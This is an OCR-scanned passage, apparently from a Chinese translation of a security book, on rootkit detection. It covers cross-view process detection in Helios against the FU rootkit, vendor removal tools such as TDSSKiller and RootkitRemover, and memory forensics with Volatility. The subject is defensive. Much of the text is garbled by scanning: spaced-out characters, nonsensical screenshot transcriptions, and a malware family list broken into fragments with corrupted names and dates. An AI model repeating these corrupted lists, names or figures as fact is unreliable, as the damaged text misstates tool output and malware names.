隐藏 注册 表 项 和 隐藏 文件 。 


Helios Lite 使 用 一 个 GUI 程序 与 其 内 核 模 式 驱动 程序 helios.sys 通 信 。 这 两 个 组 件 一 起 ， 能 够 检测 大 部 分 Rootkit 钩 子 和 隐藏 
技术 。Helios 由 一 个 .NET GUI 用 户 模式 应 用 程序 、 两 个 程序 库 /DLL 和 一 个 内 核 驱 动 程序 chkproc.sys 组 成 。 


为 了 检测 隐藏 进程 ，Helios Lite 使 用 前 面 讨 论 的 交叉 视图 方法 。 过 读 取 内 核 结构 PspCidTable 获 得 活动 进程 /线程 列表 
的 低级 视图 。 这 个 表格 存储 有 关 运 行进 程 和 线程 的 信息 。 然 后 Helios Lite 比 较 存储 在 表格 中 的 信息 和 高 级 Windows API 调 用 的 
结果 ， 对 于 任何 可 能 代表 隐藏 进程 的 差异 做 出 提示 。 图 10-12 显 示 Helios Lite 检 测 FU Rootkit 隐 藏 的 Notepad 进 程 。 


Helios 使 用 相同 的 技术 ， 但 是 方法 不 同 。Helios 试 图 主动 监控 和 阻止 Rootkit 感 
动 防御 之 前 的 基本 用 户 界 面 。 


染 你 的 系统 。 图 10-13 显 示 了 开始 扫描 或 者 主 








HOn Demand Scan ( 按 需 扫描 ) ， 你 5 
是 关于 感染 的 信息 ， 还 有 Helios 确 定 感染 存在 的 方法 。 














BE lAavoy 


™® Helios Lite - Hidden Process Scan 


File ScanType Help 


EPROCESS PID Process Name Process Path Type of Discrepancy ^ 


0x82074b88 wscntfy,exe CWWINDOWS'\system32\wscntfy ,exe 
0x822f9970 VBoxService.exe C:\WINDOWS\system32\¥BoxService.exe 
0x821b4880 svchost.exe C:\ WINDOW S\system32\svchost.exe 
0x821d35e8 svchost.exe C:\WINDOWS\system32\syvchost.exe 
0x8206d8b0 Helios Lite.exe C:\Documents and Settings\tester|\Desktop\H... 
0x820765d8 alg.exe C:\WINDOWS\system32\alg.exe 

0x820b7020 svchost.exe C:\WINDOWS\system32\svchost.exe 
0x82226318 cmd.exe C:\WINDOWS\system32\cmd.exe 

0x82160a80 svchost.exe C:\WINDOWS\system32\syvchost.exe 
Ox822FF6b0 svchost.exe C:\WINDOWS\system32\svchost.exe 
0x821F5650 notepad.exe C:\ WINDOW S\system32\notepad.exe Hidden Process 
0x82098020 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe 
0x82097020 explorer.exe C:\ WINDOWS \explorer,exe 

0x821b2da0 VBoxTray.exe C:\WINDOWS\system32\VBoxTray.exe 
0x822247e8 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe 


Scan Completed 


[C] Show Improperly Terminated Processes 





图 10-12 Helios Lite 


注意 隐藏 进程 notepad.exe 的 入 口 点 。Helios 报 告 映像 路 径 (Image Path) 字段 为 空 (FU 清除 了 这 个 字段 ) ， 很 显然 这 是 
一 个 隐藏 进程 。 但 是 Helios 报 告 的 最 有 用 的 信息 是 哪些 技术 不 能 看 到 这 个 进程 而 哪个 能 够 成 功 地 发 现 。ZQSI、Eprocess List 和 
Eproc Enum3 个 栏目 引用 Helios 用 于 寻找 隐藏 进 程 的 交叉 视图 分 析 中 的 3 个 数据 点 。 第 一 列 是 ZQSI，3 引 用 Win32API 
ZwQuerySystemInformation () ， 这 个 API 用 于 从 内 核 或 者 用 户 模式 获取 进程 列表 。 第 二 列 是 Eprocess List， 遍 历 EPROCESS 
链表 结构 。 第 三 列 是 Eproc Enum ， 对 所 有 可 能 的 进程 ID 号 进行 简单 模式 匹配 。 如 果 这 些 数 据点 中 有 任何 差异 ，Helios 就 会 报 
告 。 这 时 ， 可 以 单 击 Unhide 将 notepad.exe 重 新 链接 到 EPROCESS 列 表 中 。 


Œ HELIOS - Advanced Malware Detection System v1.1a 


On Demand Scan System Status Process Information Kernel Modules System Call Table Inoculation Status Log 
r- Hidden Proc 
Toggle Backgound Scan 


Advanced Detection 


Enable App Protection Disabled 
Disabled 
Inoculation 


Clear Status Log x Applications 


About onitor Kernel Module Loading 





图 10-13 Helios 


Œ HELIOS - Advanced Malware Detection System v1.1a 


On Demand Scan System Status Process Information Kernel Modules System Call Table Inoculation Status Log 

PID Name Image Path ZOSI Eprocess List Eproc Enum Terminate Unhide 
S Kill 
Kill 
Kill 
Kill 
Kill 





Toggle Backgound Scan System Ide P 
>Y TE 


HELIOS.exe \Device\Harddisk¥olume1\Doc... 








Advanced Detection 








msmsgs.exe \Device\Harddisk¥olume1\Pro... 


Enable App Protection VBoxTray,exe  \Device\HarddiskVolume1\WI... 











wmipryse.exe  \Device\HarddiskVolume1\ WI... 








Inoculation = 
explorer.exe \Device\Harddisk¥Volume1\WI... Kill 





Kill 
Kill 
Kill Unhide 
一 一 一 一 一 
Kill 
Kill 
Kill 
Kill 
Kill 
Kill 
Kill 
Kill 
Kill 


Clear Status Log spoolsv.exe \Device\Harddiskvolume 1 \ WI... 








svchost.exe \Device\Harddisk¥Volume1\WI... 








About 


notepad.exe 





svchost.exe \Device\HarddiskVolume1\WI... 





Exit 





svchost.exe \Device\Harddisk¥olume1\WI... 








cmd.exe \Device\HarddiskVolume1\WI... 








svchost.exe \Device\Harddisk¥olume1\WI... 








alg.exe \Device\HarddiskVolume1\WI... 








svchost.exe \Device\HarddiskVolume1\WI... 








svchost.exe \Device\Harddisk¥Volume1\WI... 





VBoxService.... \Device\HarddiskVolume1\WI... 








wscntfy exe \Device\Harddisk¥olume1\WI... 





lsass,exe \Device\Harddiskyolume1l\wTI,,， 





EA Gas S eS Ee NARS mS < 
A fee S Bee S eS eS ee X eS OS eS Sa< 








A 


kill 


servires eye WMevice\lHardetickVok inet WAT 


[Eprocess: 23, ZwQSI: 23, EprocEnum: 23, HIDDEN: 1] C 











图 10-14 Helios 查 找 隐藏 进程 


Helios 真 正 独特 的 是 主动 防御 功能 。 单 击 Toggle Background Scan (触发 后 台 扫描 ) ，Helios 将 自动 轮 询 系统 ， 观 察 是 否 
有 变化 。 这 使 Helios 有 点 像 是 恶意 软件 /Rootkit 感 染 的 实时 报告 工具 。 在 Inoculation (免疫 ) 菜单 下 还 有 更 多 的 监控 功能 ， 包 


$§: Monitor Kernel Module Loading (监控 内 核 模 块 装 入 ) ，Block Access to Physical Memory (阻止 物理 内 存 访问 ) 和 
Monitor Access to Files and Applications (监控 文件 和 应 用 程序 访问 ) 。 在 免费 版 本 中 没有 完全 实现 Advanced 
Detection (高 级 检测 ) 和 Enable App Protection defense (启用 应 用 程序 保护 防御 ) 功能 。 


Helios 和 Helios Lite 都 因为 有 一 个 巧妙 的 、 由 经 过 验证 的 研究 和 大 量 文档 /白皮书 支持 的 用 户 界 面 而 自豪 。 极 其 易于 理解 的 
界面 设计 和 功能 使 其 成 为 任何 Rootkit 检 测 工具 箱 的 强 有 力 候选 者 。 


10.5.9 McAfee Rootkit Detective 


McAfee 是 首先 发 行 免费 Rootkit 检 测 实用 程序 的 商业 供应 商 之 一 。 在 2007 年 发 行 了 Rootkit Detective (在 竞争 对 手 F- 
Secure 于 2006 年 发 行 Blacklight 之 后 不 久 ) ，McAfee 的 Avert Labs 很 快 从 安全 社区 中 得 到 赞扬 。 


Rootkit Detective 和 它 的 名 字 一 样 是 个 单纯 的 工具 ， 使 用 户 能 够 查看 隐藏 进程 、 文 件 、 注 册 表 项 、 挂 钩 的 服务 、IAT/EAT 钩 
子 以 及 detour 风 格 的 修补 。GUI 界 面 由 一 个 面板 组 成 ， 上 面 有 可 以 用 来 改变 活动 屏幕 的 单 选 按钮 。 


Rootkit Detective 在 显示 发 现 的 情况 时 提供 了 基本 的 修复 功能 。 图 10-15 显 示 了 对 隐藏 的 notepad.exe 进 程 可 用 的 基本 修补 
操作 : 提交 、 终 止 和 改名 。 


M Rootkit Detective 1.0 Z) 


McAfee | Rootkit Detective Helo About 


Scan results 
(* View hidden processes and files C View hooked services 


C View hidden registry keys/values C View hooked imports/exports 


C View all processes 


Process/File name PD | Process/File 
notepadexe | 968 | C:\WINDOWS \system32\notepad. exe 


Scan status 


Found hidden Processes and Files: 1 
Total files scanned: 25742 


Terminate | Rename | Close | 


10-15 Rootkit Detective 





随 着 新 的 Rootkit 技 术 不 断 出 现 ，MCcAfee 发 行 了 新 工具 RootkitRemover。 这 是 一 个 独立 工具 ， 可 以 检测 和 删除 
ZeroAccess, Necurs#JTDSS Rootkit。 根 据 McAfee 公 司 的 说 法 ， 未 来 的 版 本 将 履 盖 更 多 Rootkit 家 族 。 图 10-16 展 示 了 正在 扫 
描 的 RootkitRemover， 更 多 相关 信息 可 以 在 http://www.mcafee.com/us/downloads/free-tools/how-to-use- 
rootkitremover.aspx 上 找到 。 





WW Ci\Users\ 


Rootkit Remover 
chfee Labs. 


\Desktop\RootkitRemover.exe 


v0.8.9.1708 [Sep 5 2613 - 14:48:52] 


Jindows build 6.1.'7661 x86 Service Pack i 
shecking for updates 


canning for user-mode threats s 
Malware Found > Zerofccess trojan detected??? 
-=> Malicious file: C:\Program Files\Google\Desktop\NInstall\<6£387b35-d45c-c 
ib-db24-d9cd2aiBcfe?>\ \...\C deleted > 
—-—> Malicious file: C:\Users\ 
K6£387b35—-d45c-—c61b-db24-d?cd2aiBcfe?7>\¢ 


\AppData\Local\Google\DesktopNInstall\ 
deleted > 


<6£387b35 


> Malicious file: 
d45c~-c6i1b 
==> Malicious file: 
db24-d?cd2aiGcfe?7>\ 
——> Malicious file: 
adb24-—d9cd2aiGcfe?7>~ 

> Malicious file: 
db24-d?cd2aiBcfe?7>\ 

> Malicious file: 
db24-d?cd2aiBcfe?7>\ 
——> Malicious file: 
-db24-—d?cd2ai1Gcfe7>~ 

> Malicious file: 
db24-d?cd2aiBcfe?7>\ 


dh24 


C 


:\Users\ \AppData\Local\Google\Desktop\NInstall\ 
d9¥cd2aiGcfe?7>\¢ deleted > 


>=\Program Files\Google\Desktop\NInstall\t6f387b35-d45c-—c 


G: 


\...NC deleted 2 
\Program Files\Google\Desktop\I nstall\<6f387b35-d45c-c 
\...\C deleted > 
=\Program Files\Google\Desktop\Install\<6f£387b35—-d45c-c 
\...-NC deleted > 
=\Program Files\Google\Desktop\Install\<6f£387b35—-d45c—c 
\...NC deleted > 
-\Program Files\Google\Desktop\I nstall\<6f£387b35-d45c-c 
\...-N\C deleted > 
\Program Files\Google\Desktop\Install\<6£387b35-d45c-c 
\...NC deleted > 


==> Malicious file: 
db24-d?cd2aiGcfe?>\ 
—-> Malicious file: 
~ restart > 
Zerofccess 


:\Program Files\Google\Desktop\NInstall\t6f£387b35—-d45c—c 
\...N\C will be deleted after restart > 
-\Windows\assembly\GAC\desktop.ini < will be deleted af 


C 
C 
C 
Cs 
GC 
C 


trojan was cleaned successfully? 


Scanning for kernel-mode threats 
Detected MDSs: 
sAbAFfa?b472c6d75cc25bf5fe5b8699e 
cdb@f a9hb472c6d75cc25bf5feSh869Ge 
1515a71082c 7eacc?P?F3882059c1%e8e 
6e 71f 427411319 7ad75262af 24f bi be? 
 e2eb24e6bd36b8be3869ece85aa72bc 
Sd8aeS5aic57?c3b441f abdb83586c 7dGe 
c4696bb59492e1 4aba35126icfaeP94 
> 715382chcf a4661laf 47£861696Fb22d 
fcOcbef 865d96745e6 7b7H6f f B6cc 74 
bbd8e2ed426f ac421cc4aaf5d72626fb 
6b384644e Be B6F O5e58 he 7 O5%ef Sdl 


can Finished 
LEASE REBOOT IMMEDIATELY TO COMPLETE CLEANING. 


Other recommendations: 
1. Perform full scan with McAfee VirusScan product after reboot. 
Press any key to continue 





图 10-16 RootkitRemover (来 源 : www.mcafee.com) 


TDSSKiller 最 初 是 用 于 删除 臭名 昭著 的 TDSS Rootkit 的 工具 。 该 工具 因为 其 效率 和 在 研究 人 员 和 用 户 之 间 的 流行 度 ， 已 经 扩 
展 ， 包 合 其 他 Rootkit 家 族 。 在 本 书写 作 时 ， 支 持 的 Rootkit 家 族 包括 : 


- Rootkit.Win32.TDSS 
- Rootkit.Win32.Stoned.D 


- Rootkit.Boot.Cidox.A 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 


- Root 
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- Root 


- Root 


- Root 
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it.Boot.SST.A 


it.Boot.Pihar.A, B#eC 


it.Boot.CPD.A 


it.Boot.Bootkor.A 


it. Boot.MyBios.B 


it. Win32.TDSS.MBR 


it. Boot. Wistler.A 


it.Win32.ZAcess.aml, C. Es F G Hy h JK 


it.Boot.SST.B 


it.Boot.Fisp.A 


t.Boot.Nimnul.A 


t.Boot.Batan.A 


it.Boot.Lapka.A 


it. Boot.Goodkit.A 


it.Boot.Clones.A 


it. Boot. Xpaj.A 


it.Boot.Yurn.A 


it. Boot.Prothean.A 


it.Boot.Plite.A 


it.Boot.Geth.A 


it.Boot.CPD.B 


* Backdoor.Win32.Trup.A, B 


- Backdoor.Win32.Sinowal.knf, kmy 


- Backdoor. Win32.Phanta.A, B 


- Virus. Win32.TDSS.A, B, C, D#eE 


< Virus. Win32.Rloader.A 


< Virus. Win32.Cmoser.A 


:Virus.Win32.ZhabaA、B 和 C 


- Trojan-Clicket.win32.Wistlet.A、B 和 C 


“ Trojan-Dropper.Boot.Niwa.A 


* Trojan-Ransom.Boot.Mbro.D、 E 


- Trojan-Ransom.Boot.Siob.A 





* Trojan-Ransom.Boot.Mbro.F 


TDSSkKiller 支 持 Windows10， 使 其 在 检测 Windows10Rootkit 方 面 很 有 价值 。 如 果 你 相信 这 一 点 ， 可 以 考虑 做 个 实验 
Windows10 上 执行 以 上 任何 恶意 软件 ， 然 后 用 TDSSkKiller 检 测 它们 。 


TDSSkKiller 的 更 多 相关 信息 可 以 在 https://support.kaspersky.com/viruses/disinfection/5350 上 找到 。 


10.5.11 Bitdefender Rootkit Remover 


与 其 他 Rootkit 删 除 程序 不 同 ，Bitdefender Rootkit Remover 可 以 在 不 重启 机 器 的 情况 下 立即 启动 。 它 可 以 检测 如 下 
软件 家 族 : 


* Mebroot 

“ 已 知 的 TDL 家 族 (TDL/SST/Pihar) 
* Mayachock 

- Mybios 

- Plite 

> XPaj 

- Whistler 

- Alipop 

- Cpd 

“ Fengd 

- Fips 

- Guntior 

- MBR Locker 
- Mebratix 


- Necuts 


1 在 


YE 7 = 


‘NS 


- Zegost 
(RAI LAFEhttps://labs. bitdefender.com/projects/rookit-remover/rootkit-remover_E JS f##BXF Bitdefender Rootkit 
Remover 的 信息 。 


10.5.12 Trend Micro Rootkit Buster 


Rootkit Buster 是 Trend Micro 的 旗舰 级 防 Rootkit 工 具 。 它 检测 隐 含 文件 、 注 册 表 项 、 进 程 、 驱 动 程序 、 服 务 、 端 口 和 
MBR ( 主 引 导 记 录 ) 中 的 异常 ， 以 扫描 Rootkit。 这 个 工具 很 容易 启动 ， 支 持 Windows10。 更 多 相关 信息 可 访 


问 https://www .trendmicro.com/download/rbuster.asp。 


10.5.13 Malwarebytes Anti-Rootkit 


Malwarebytes Anti-Rootkit 目 前 处 于 测试 阶段 。 除 了 检测 Rootkit 之 外 ， 它 还 为 你 提供 从 系统 中 删除 Rootkit 的 选项 。 该 工 
具 的 更 多 信息 请 访问 https://www.malwarebytes.com/antirootkit/。 


10.5.14 Avast aswMBR 


Avast aswMBR 使 用 虚拟 化 技术 检测 Rootkit。 缺 点 是 你 的 系统 必须 支持 硬件 虚拟 化 。Avast aswMBR 可 以 检测 如 下 恶意 软 
件 家 族 : 


- TDL4/3 (Alureon) 
- ZAccess 

- MBRoot (Sinowal) 
- Whistler 

- SST 

- Cidox 

- Pihar 


你 可 以 在 http://public.avast.com/~gmerek/aswMBR.htm 了 解 更 多 相关 信息 。 


10.5.15 ”商业 Rootkit 检 测 工具 


大 部 分 商业 ( 换 句 话说 ， 你 必须 花 钱 才能 得 到 的 ) Rootkit 检 测 工具 都 不 是 最 先进 的 ， 很 容易 被 最 新 的 Rootkit 绕 过 。 原 因 是 
商业 安全 公司 不 能 依靠 最 新 的 Rootkit 检 测 技术 ， 因 为 大 部 分 这 种 技术 对 于 几 百 万 普通 用 户 都 没有 足够 的 可 靠 性 。 就 算 不 是 每 个 
安全 软件 公司 都 如 此 ， 但 是 Rootkit 社 区 中 的 人 们 都 相信 免费 的 工具 Rootkit Unhooker 和 GMER 比 它们 的 商业 化 对 手 更 好 。 


而 且 ， 由 于 大 部 分 商业 软件 供应 商 源 自 特征 码 匹 配 ， 他 们 试图 在 使 用 前 面 提 到 的 技术 之 前 利用 特征 码 方法 来 识别 Rootkit。 
我 们 已 经 在 前 面 的 章节 中 讨论 过 基于 特征 码 的 检测 技术 的 优 务 。 令 人 伤心 的 是 ， 商 业 化 软件 供应 商都 秉承 “ 当 你 只 有 和 锤子， 什么 
看 上 去 都 像 钉子 ”的 哲学 ， 这 意味 着 如 果 你 只 有 一 种 检测 方法 ， 任 何 东 西 都 用 这 种 方法 进行 检测 。 


当然 ， 只 使 用 一 种 方法 不 会 阻止 商业 软件 供应 商 试 图 建立 一 个 无 人 进入 的 市 场 。2003 年 首先 露面 的 HBGary 由 前 Rootkit 作 
者 Greg Hoglund 创 立 。 作 为 一 个 风险 减轻 市 场 上 的 公司 ，HBGary 实 际 上 精通 于 逆向 工程 和 高 级 Rootkit 检 测 。 它 们 长 期 的 旗舰 
产品 HBGary Inspector (独立 的 软件 调试 程序 ) 在 2007 年 年 未 停产 并 且 集 成 到 新 的 事故 响应 产品 Responder 中 。Responder 使 
调查 取证 人 员 能 够 捕捉 和 分 析 Rootkit 和 恶意 软件 所 用 的 物理 内 存 。HBGary 已 经 成 为 企业 取证 分 析 和 Rootkit 检 测 领 域 中 的 领先 
者 。HBGray 现 已 被 CounterTack 公 司 收购 ， 在 这 次 收购 之 后 ，CounterTack 在 Responder 技 术 的 基础 上 发 布 了 Responder 
Pro， 该 产品 不 仅 支 持 Windows， 还 支持 Linux。 


行业 中 的 其 他 竞争 者 很 快 做 出 反应 ， 控 制 这 个 新 兴 市 场 的 竞争 非常 活跃 。 新 加 入 的 Mandiant 和 HBGary 等 公司 开始 挑战 主 
流 的 Guidance Software 和 AccessData， 挑 战 磁盘 取证 和 粗略 的 易 失 性 数据 分 析 就 足以 应 付 取证 调查 的 思路 。 企 业 级 产品 如 
HBGary 的 Responder 和 Mandiant 的 Intelligent Response 组 合 了 从 内 人 存 快照 中 发 现 高 级 恶意 软件 的 分 析 技 术 。 在 商业 产品 中 引 
入 这 些 简单 的 功能 极 大 地 改变 了 数字 取证 、 恶 意 软件 分 析 和 Rootkit 检 测 的 局 面 。 


结果 是 ，2008 年 免费 工具 出 现 井 喷 ， 因 为 每 家 公司 都 努力 证 明 自 己 的 恶意 软件 分 析 和 Rootkit 检 测 能 力 。 这 些 工 具 包 括 : 
- HBGary FlyPaper 在 内 存 中 查找 恶意 软件 /Rootkit， 并 且 阻 止 它 们 趣 载 或 者 终止 。 


- Mandiant Red Curtain ”统计 分 析 程 序 二 进 制 文件 ， 确 定 它们 的 恶意 能 力 ， 用 数字 值 和 色彩 代码 为 每 个 二 进 制 文件 计 分 ， 表 
示 二 进 制 文件 的 恶意 可 能 。 它 使 用 了 类 似 蚁 分 析 的 技术 来 搜索 常见 的 恶意 软件 策略 ， 如 打包 、 加 密 和 其 他 特性 。 尽 管 不 是 新 的 概 
念 ， 但 是 Red Curtain 是 可 以 保留 在 工具 箱 中 的 有 用 的 免费 工具 。 


今天 ， 商 业 化 Rootkit 检 测 工具 市 场 形势 变 得 很 困难 ， 因 为 免费 Rootkit 删 除 工具 的 效率 已 经 足以 赢得 研究 人 员 和 用 户 的 信 
任 。 


大 部 分 提 到 过 的 公司 都 关注 于 在 内 存 取证 分 析 领 域 中 开发 自己 的 Rootkit 检 测 能 力 。 
10.5.16 ”使 用 内 存 分 析 的 脱 机 检测 : 内 存 取证 的 革新 


刚才 讨论 的 商业 产品 中 的 Rootkit 检 测 和 数字 取证 中 的 进步 ， 大 部 分 归功 于 研究 领域 中 对 数字 取证 的 兴趣 的 复苏 。 这 一 研究 
领域 被 称 为 内 存 取证 ， 处 理 两 个 广泛 的 难题 : 


内 存 获 取 ”调查 者 如 何在 取证 中 捕捉 物理 内 存 的 内 容 ? 
ARPT ”获取 内 存 转 储 后 ， 你 如 何 从 大 量 的 数据 中 提取 痕迹 和 证 据 。 


那么 内 存 取证 和 Rootkit 检 测 有 什么 关联 呢 ” 答 案 是 内 人 存 取证 给 了 你 另外 一 个 搜索 恶意 软件 和 Rootkit 的 场所 。 考 虑 一 下 数字 
取证 的 情况 ， 传 统 上 ， 数 字 取 证 调查 关注 于 从 硬盘 和 基本 的 易 失 性 数据 (从 系统 内 存 中 收集 的 信息 ， 如 运行 进程 的 列表 ， 系 统 时 


间 和 标识 数据 ， 网 络 连 接 等 ) 中 获取 和 分 析 证 据 。 但 是 2008 年 NIST 和 Volatile 的 联合 研究 显示 ， 当 前 的 分 析 方 法 所 覆盖 的 只 是 
易 失 性 存储 (如 物理 内 存 ) 中 可 用 证 据 的 不 到 4% (http://www.4tphi.net/fatkit/papers/aw_AAFS pubv2.pdf) 。 在 法 庭 上 
没有 可 靠 和 可 接受 的 证 据 引 发 了 系统 完整 性 检查 的 使 用 ， 这 种 方法 用 于 确保 系统 处 在 收集 的 数据 可 接受 和 正确 的 状态 中 。 


换 句 话说 ， 数 字 取 证 技术 不 足以 发 现 内 人 存 中 的 恶意 软件 。 而 且 ， 随 着 恶意 软件 和 Rootkit 不 断 发 展 ， 它 们 变 得 更 加 隐蔽 ， 大 
部 分 隐藏 于 内 存 中 从 而 消除 了 对 硬盘 的 依赖 。 这 迫使 取证 工具 发 展 ， 我 们 从 前 一 小 节 所 讨论 的 产品 发 行 中 可 以 看 到 这 种 发 展 成 为 
了 主流 。 在 这 一 学 科 的 早期 阶段 我 们 实际 上 目击 了 正式 的 数字 取证 和 难以 捉摸 的 Rootkit 检 测 笨拙 的 合并 。 


2014 年 ，Wylie Shanks 撰 写 了 一 篇 论文 ， 正 如 其 摘要 中 所 陈述 的 ， 这 篇 论文 涵盖 了 数字 取证 、 内 存 分 析 和 恶意 软件 沙 箱 化 
在 改进 事故 响应 实践 中 的 重要 作用 。 文 章 中 讨论 的 技术 包括 Mandiant Redline、Volatility 和 Cuckoo Sandbox ( 参 
见 https://www.sans.org/reading-room/whitepapers/incident/enhancing-incident-response-forensic-memory- 


analysis-malware-sandboxing-techniques-34540) 。 


商业 工具 无 疑 不 是 第 一 种 将 内 存 获 取 和 分 析 与 Rootkit 检 测 技术 联姻 的 工具 。 我 们 可 以 证 明 ， 第 一 个 理解 这 种 思路 ， 随 后 将 
其 带 入 主流 商业 公司 的 社区 是 数字 取证 社区 。 具 体 地 说 ，2005 年 中 ， 数 字 取 证 研究 工作 室 (Digital Forensic Research 
Workshop, DFRWS, http://www.dfrws.org) 对 其 社区 提出 了 一 个 挑战 : 根据 一 个 物理 内 存 转 储 重 建 入 侵 的 时 间 轴 。 获 胜 者 
之 一 GMG Systems 公 司 的 George M.Garner 编 写 了 一 个 名 为 KNTList 的 工具 ， 能 够 从 内 存 转 储 中 解析 信息 ， 重 建 证 据 如 进程 列 
表 和 装 入 的 DLL， 并 且 分 析 内 存 转 储 以 破译 入 侵 的 场景 。 该 工具 变 得 非常 流行 ， 以 至 于 GMG Systems 将 它 放 入 一 个 数字 调查 分 
析 工 具 套 件 中 。 它 在 取证 业界 成 为 最 受 尊敬 和 最 广泛 使 用 的 工具 之 一 。 


近年 来 ， 发 行 了 多 个 免费 的 内 存 获取 工具 ， 包 括 : 
- Matthew Suiche 开 发 的 Win32dd。 

- Mantech 开 发 的 Memory DD (mdd) 。 

- Agile Consulting 开 发 的 Nigilant32。 


几乎 所 有 主要 的 取证 公司 都 在 产品 中 包含 了 内 存 获取 功能 ,但 是 这 些 产品 大 多 数 在 内 存 转 储 分 析 中 都 有 严重 的 缺失 。 大 部 分 
这 些 工具 都 容易 理解 ， 所 以 我 们 对 其 功能 的 使 用 不 做 进一步 的 详细 解释 。 


可 用 的 内 存 分 析 工 具 较 少 ， 因 为 分 析 是 更 加 困难 的 过 程 。 但 是 ,我们 将 介绍 两 个 相当 强大 的 免费 工具 : Volatile Systems 开 
发 的 Volatility Framework 和 Mandiant 开 发 的 Memoryze。 


Volatility Framework 


Volatility Framework 是 一 个 内 存 分 析 环 境 ， 具 有 一 个 根据 Volatile Systems 的 Aaron Walters 的 研究 开发 的 可 扩展 底层 工 
具 框 架 。Aaron 被 认为 是 现代 高 级 内 存 分 析 技 术 的 葛 基 人 之 一 。 他 是 FATkit 的 合 著者 之 一 ， 这 篇 文章 提升 了 对 数字 调查 过 程 中 内 
存 取证 需求 的 认同 。 


Volatility 的 核心 包含 一 个 Python 脚本 库 ， 进 行 可 疑 系统 的 内 存 转 储 中 存储 的 数据 结构 的 解析 和 重建 。 这 种 解析 的 低级 细 
节 、 重 建 和 表现 是 从 用 户 提取 的 ， 所 以 不 需要 Windows 操 作 系统 的 复杂 知识 。Volatility 还 支持 其 他 内 存 转 储 格式 ， 包 括 使 用 dd 
得 到 的 未 加 工 内 存 转 储 、Windows 休 眠 文件 (存储 在 C: \hiberfilsys) ， 以 及 崩溃 转 储 。 


Volatility 提 供 从 内 存 转 储 的 基本 信息 ， 包 括 : 


. 运行 中 的 进程 和 线程 。 


打开 的 网 络 套 接 字 和 连接 。 

` 用 户 和 内 核 模式 中 装 入 的 模块 。 

* 进程 使 用 的 资源 ， 如 文件 、 对 象 、 注 册 表 键 值 和 其 他 数据 。 
. 转 储 单个 进程 或 者 任何 二 进 制 文件 的 能 力 。 


图 10-17 显 示 了 使 用 Volatility 核 心 模 块 pslist， 从 一 个 样 例 内 存 转 储 中 解析 而 得 的 简单 进程 列表 。 





c C:\WINDOWS\System32\cmd.exe 







=<Wolatility>python volatility pslist -f memdump.bin 

ame Pid PPid Thds Hnds Time 

ystem 4 8 49 188 Thu Jan 61 66:66:66 1976 
smss -exe 368 4 3 21 Fri Feb 27 22:18:56 2009 
csFss -.-eXe 516 368 10 304 Fri Feb 27 22:18:56 2609 
winlogon.exe 544 368 19 438 Fri Feb 27 22:18:56 2009 
Sekuices .eXe 652 544 21 279 Fri Feb 27 22:18:57 2009 
llsass .exe 664 544 20 298 Fri Feb 27 22:18:57 2009 
UBoxServ ice .exe 816 652 3 64 Fri Feb 27 22:18:57 2009 
suchost .exe 856 652 9 222 Fri Feb 27 22:18:57 2609 
suchost .exe 956 652 64 998 Fri Feb 27 22:18:57 2009 
ssuchost .exe 1616 652 4 88 Fri Feb 27 22:18:57 2009 
svchost.exe 1646 652 13 183 Fri Feb 27 22:18:57 2609 
llogonui .exe 1686 544 4 128 Fri Feb 27 22:18:57 2609 
explorer.exe 1432 1392 13 344 Fri Feb 27 22:18:58 2009 
spoolsv .exe 1464 652 16 131 Fri Feb 27 22:18:58 2009 
UBoxTray.exe 1556 1432 7 39 Fri Feb 27 22:18:58 2009 
msmsgs .exe 1568 1432 3 122 Fri Feb 27 22:18:58 2609 
cmd.exe 472 1432 1 21 Fri Feb 27 22:26:11 2609 
win32dd.exe 1444 472 1 25 Fri Feb 27 22:29:34 2609 
C:\Wolatility> 








图 10-17 Volatility 产 生 简单 的 进程 列表 


然后 ， 这 些 数据 可 以 由 调查 人 员 分 析 和 关联。 一 般 来 说 ， 调 查 人 员 了 解 Rootkit 或 者 恶意 软件 使 用 的 技术 (例如 ,钩子 或 者 
修补 ) ， 所 以 剩 下 的 就 是 从 Volatility 提 供 的 数据 中 寻找 那 种 技术 的 证 据 。 


我 们 不 去 探究 Volatility 的 内 部 工作 原理 ， 但 重要 的 是 理解 它 用 于 识别 内 存 转 储 中 的 操作 系统 结构 的 技术 (还 使 用 了 其 他 技 
术 ， 但 是 我 们 只 介绍 基本 的 扫描 ) 。Volatility 使 用 其 对 Windows 符 号 和 数据 结构 的 认识 ， 根 据 唯 一 定义 关键 数据 结构 的 字段 构 
建 特征 码 。 例 如 ， 进 程 在 内 存 里 由 EPROCESS 数 据 结构 表示 。 这 个 结构 包含 许多 其 他 Windows 数 据 结构 不 包含 的 字段 。 
此 ，Volatility 利 用 对 哪些 独特 字段 定义 各 种 结构 的 认识 ,扫描 内 存 查找 这 些 指示 。 


让 我 们 以 老 朋友 FU 为 例 。 在 第 4 章 中 已 经 提 到 ， 我 们 知道 这 个 Rootkit 的 功能 之 一 是 使 用 直接 内 核对 象 操纵 (DKOM) 隐藏 
进程 和 模块 。 具 体 地 说 ， 它 修改 内 存 中 Windows 用 于 维护 项 目 列表 的 内 核 结 构 。 通 过 直接 在 内 存 中 修改 结构 ， 它 自动 地 污染 了 
所 有 API 函 数 调用 不 管 是 原生 的 (也 就 是 ntoskrn| 的 一 部 分 ) 还 是 Win32 一 一 它们 都 从 Windows 请 求 那些 信息 。 





然而 ，DKOM 不 会 影响 脱 机 内 存 分 析 。 我 们 前 面 已 经 说 明 过 ， 脱 机 分 析 相 对 实时 分 析 的 主要 好 处 是 你 不 必 依赖 操作 系统 或 
者 其 组 件 (例如 对 象 管理 器 ) 得 到 信息 。 相 反 ， 你 可 以 自己 从 内 存 中 提取 信息 。 


你 可 以 向 FU Rootkit 发 出 一 个 隐藏 进程 的 命令 。 这 一 操作 如 图 10-18 所 示 。 发 给 FU 的 命令 在 命令 提示 窗口 中 ， 结 果 可 以 从 
Windows 任 务 管理 器 窗口 中 看 到 : notepad.exe 进 程 没 有 列 出 ， 但 是 记事 本 应 用 程序 明显 正在 运行 。 


© Windows Task Manager 


F Untitled - Notepad = (Ox 
File Edit Format View Help File Options View Shut Down Help 


C:\WINDOWS\system3?2\cmd.exe 
UBoxTray.exe 71452 


Process: 
Process: 
Process: 
Process: 
Process: 
Process: 
Process: 








msmsgs .exe:416 
ms iexec .exe 2892 
ms iexec .exe 71612 
cmd.exe :296 
taskmgr.exe :788 
notepad.exe 71456 


